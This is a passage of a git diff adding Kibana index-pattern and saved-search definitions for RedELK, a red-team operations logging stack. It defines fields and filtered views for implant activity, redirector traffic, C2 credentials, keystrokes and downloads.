"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171862691, 16], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson new file mode 100644 index 00000000..26767be9 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson @@ -0,0 +1 @@ +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.3", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171864697, 18], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson new file mode 100644 index 00000000..e22f399a --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson @@ -0,0 +1 @@ +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171866710, 20], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson new file mode 100644 index 00000000..fae91607 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson @@ -0,0 +1 @@ +{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171868723, 243], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson new file mode 100644 index 00000000..7e78ab03 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson @@ -0,0 +1 @@ +{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171870762, 242], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson new file mode 100644 index 00000000..3592c569 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson @@ -0,0 +1,16 @@ +{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 198], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 201], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 209], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 212], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 215], "type": "search", "version": "1"} +{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 217], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": 